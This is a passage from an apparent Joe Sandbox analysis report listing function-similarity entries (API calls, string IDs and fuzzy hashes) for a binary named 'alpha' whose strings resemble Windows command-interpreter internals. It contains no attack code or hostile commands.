                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp$Heap$AllocProcess
                                                                    • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                    • API String ID: 3407644289-1668778490
                                                                    • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                    • Instruction ID: 155eea1199777a238d196db077484fb616d4ff5103444670d9cc9c8ad405a8b8
                                                                    • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                    • Instruction Fuzzy Hash: 0E316E25A08D1286FB197F21E911379E6B6AF94F68F848076D60E462A5DE3CE00EC730
                                                                    APIs
                                                                      • Part of subcall function 00007FF71966D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF71966D46E
                                                                      • Part of subcall function 00007FF71966D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF71966D485
                                                                      • Part of subcall function 00007FF71966D3F0: wcschr.MSVCRT ref: 00007FF71966D4EE
                                                                      • Part of subcall function 00007FF71966D3F0: iswspace.MSVCRT ref: 00007FF71966D54D
                                                                      • Part of subcall function 00007FF71966D3F0: wcschr.MSVCRT ref: 00007FF71966D569
                                                                      • Part of subcall function 00007FF71966D3F0: wcschr.MSVCRT ref: 00007FF71966D58C
                                                                    • iswspace.MSVCRT ref: 00007FF719677EEE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$Heapiswspace$AllocProcess
                                                                    • String ID: A
                                                                    • API String ID: 3731854180-3554254475
                                                                    • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                    • Instruction ID: aad15e8d59036a8d56a6ce8b55cb3c81ddbc14b7130a44d1cb3087e79d03b2d9
                                                                    • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                    • Instruction Fuzzy Hash: 5BA18E31A09E82C9E624AF11A55127DF6B2FB45BB8F808435CA8D47795EF3CE44AD730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                    • String ID: PE
                                                                    • API String ID: 2941894976-4258593460
                                                                    • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                    • Instruction ID: a866b12cf67e7cc54c2f91a0dac909f4e94ea40ac6b6525c2cadb6c6dab35bb8
                                                                    • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                    • Instruction Fuzzy Hash: 5F416161A08B41C6E620AF11A51167DF6B2FB89BA4F845134DE5D03B99EF3CE44BCB30
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Enum$Openwcsrchr
                                                                    • String ID: %s=%s$.$\Shell\Open\Command
                                                                    • API String ID: 3402383852-1459555574
                                                                    • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                    • Instruction ID: abcf33ea7577fde617aa761d434ddc4629d696b896587ce3660a53bee38d7677
                                                                    • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                    • Instruction Fuzzy Hash: F4A19631A08F42C2EA14AF5590552BAE2B2FF85BA8FD44531DA4D07B84DE7DE94BC330
                                                                    APIs
                                                                    • iswdigit.MSVCRT(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71966F0D6
                                                                    • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF71966E626,?,?,00000000,00007FF719671F69), ref: 00007FF71966F1BA
                                                                    • wcschr.MSVCRT(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71966F1E7
                                                                    • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF71966E626,?,?,00000000,00007FF719671F69), ref: 00007FF71966F1FF
                                                                    • iswdigit.MSVCRT(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71966F2BB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: iswdigit$iswspacewcschr
                                                                    • String ID: )$=,;
                                                                    • API String ID: 1959970872-2167043656
                                                                    • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                    • Instruction ID: 2ae04fc710f0b1ecb31dcd7f22d39e742280336c229acbf1d57c04e784de1850
                                                                    • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                    • Instruction Fuzzy Hash: 92419E66E08E5286FB64AF15E514379E6F2BF507B9FC45035C98D421A4DF3CA88B8730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                    • String ID: %04X-%04X$:
                                                                    • API String ID: 930873262-1938371929
                                                                    • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                    • Instruction ID: 4ee21dc87804810fef44cc7c021f6b0a5017c6dbe2311c67093aba2c75a46678
                                                                    • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                    • Instruction Fuzzy Hash: 7F416031A08F82D6EB24AF60E4412BAE276EB84768FC04136D95E436D5DF3CD54AD731
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                    • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                    • API String ID: 3249344982-2616576482
                                                                    • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                    • Instruction ID: 6a621719b7e70e3973a7541f161f97d2a9532ea27f89d3afada338b7c0aaa6e9
                                                                    • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                    • Instruction Fuzzy Hash: A7416072618F418AE3109F12A844769FAB5FB49FE8F845234DA4E07794DF3CD05ACB24
                                                                    APIs
                                                                    • iswdigit.MSVCRT(?,?,00000000,00007FF7196768A3,?,?,?,?,?,?,?,00000000,?,00007FF7196763F3), ref: 00007FF719676A73
                                                                    • wcschr.MSVCRT(?,?,00000000,00007FF7196768A3,?,?,?,?,?,?,?,00000000,?,00007FF7196763F3), ref: 00007FF719676A91
                                                                    • wcschr.MSVCRT(?,?,00000000,00007FF7196768A3,?,?,?,?,?,?,?,00000000,?,00007FF7196763F3), ref: 00007FF719676AB0
                                                                    • wcschr.MSVCRT(?,?,00000000,00007FF7196768A3,?,?,?,?,?,?,?,00000000,?,00007FF7196763F3), ref: 00007FF719676AE3
                                                                    • wcschr.MSVCRT(?,?,00000000,00007FF7196768A3,?,?,?,?,?,?,?,00000000,?,00007FF7196763F3), ref: 00007FF719676B01
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$iswdigit
                                                                    • String ID: +-~!$<>+-*/%()|^&=,
                                                                    • API String ID: 2770779731-632268628
                                                                    • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                    • Instruction ID: f1c36c40c73135e54b91357b9d1f5119ebb78a65313fc49b3cccb593b47b59fd
                                                                    • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                    • Instruction Fuzzy Hash: 8C314C22608E56C5EA58AF01E450278B7B1FB49F99B858076DA5E03354EF3CE85AC331
                                                                    APIs
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7196714D6,?,?,?,00007FF71966AA22,?,?,?,00007FF71966847E), ref: 00007FF719671673
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7196714D6,?,?,?,00007FF71966AA22,?,?,?,00007FF71966847E), ref: 00007FF71967168D
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7196714D6,?,?,?,00007FF71966AA22,?,?,?,00007FF71966847E), ref: 00007FF719671757
                                                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7196714D6,?,?,?,00007FF71966AA22,?,?,?,00007FF71966847E), ref: 00007FF71967176E
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7196714D6,?,?,?,00007FF71966AA22,?,?,?,00007FF71966847E), ref: 00007FF719671788
                                                                    • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7196714D6,?,?,?,00007FF71966AA22,?,?,?,00007FF71966847E), ref: 00007FF71967179C
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Alloc$Size
                                                                    • String ID:
                                                                    • API String ID: 3586862581-0
                                                                    • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                    • Instruction ID: b310d3f0c013ac3e2f5b8298ad9be5bd9efb66de6142e84b1fdb47d57342b627
                                                                    • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                    • Instruction Fuzzy Hash: C1917162A09F42D1EA18AF15E450278E6B3FB54FA8F954536CA5D077A0DF3CE44AC330
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                    • String ID:
                                                                    • API String ID: 1313749407-0
                                                                    • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                    • Instruction ID: 22ace1b18f9ace76f2e6f82490095760a9148e26e21d6a8627d1dab151fd5ac3
                                                                    • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                    • Instruction Fuzzy Hash: 3451B121A08F8292EA14BF119454179E6B7BF49BB8F885270DD1E073C5DF3CE84B8630
                                                                    APIs
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF719683687
                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF71966260D), ref: 00007FF7196836A6
                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF71966260D), ref: 00007FF7196836EB
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF719683703
                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF71966260D), ref: 00007FF719683722
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Console$Write_get_osfhandle$Mode
                                                                    • String ID:
                                                                    • API String ID: 1066134489-0
                                                                    • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                    • Instruction ID: e10654dc382e693f005aab68b498d2478203e5c1df858e7b287424a041fa1a25
                                                                    • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                    • Instruction Fuzzy Hash: 3C519561B08B42D7EA286F159505979E6B2FF44BB8F884535DE0A037A1DF3CE44ACB30
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                    • String ID: KEYS$LIST$OFF
                                                                    • API String ID: 411561164-4129271751
                                                                    • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                    • Instruction ID: a8e4d610857e9795652d6486f5ca7aec6b2aa2abccb475eb46911fdfcb4b4793
                                                                    • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                    • Instruction Fuzzy Hash: EA214F20A08F02C9E654BF25E455175E673EB947B8FC49231C61E462E5EF7C954E8630
                                                                    APIs
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF719673584
                                                                    • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF71967359C
                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735C3
                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735D9
                                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735ED
                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF719673602
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                    • String ID:
                                                                    • API String ID: 513048808-0
                                                                    • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                    • Instruction ID: 693c3fc2fd764868aef9dba1d2e3665380b24546f052f79e930bc41a0c95fe07
                                                                    • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                    • Instruction Fuzzy Hash: EA114F31A08E4686EA586F24B645878EAB2FB4A77DF945375D92F033D0DE2CD44E8630
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                    • String ID:
                                                                    • API String ID: 4104442557-0
                                                                    • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
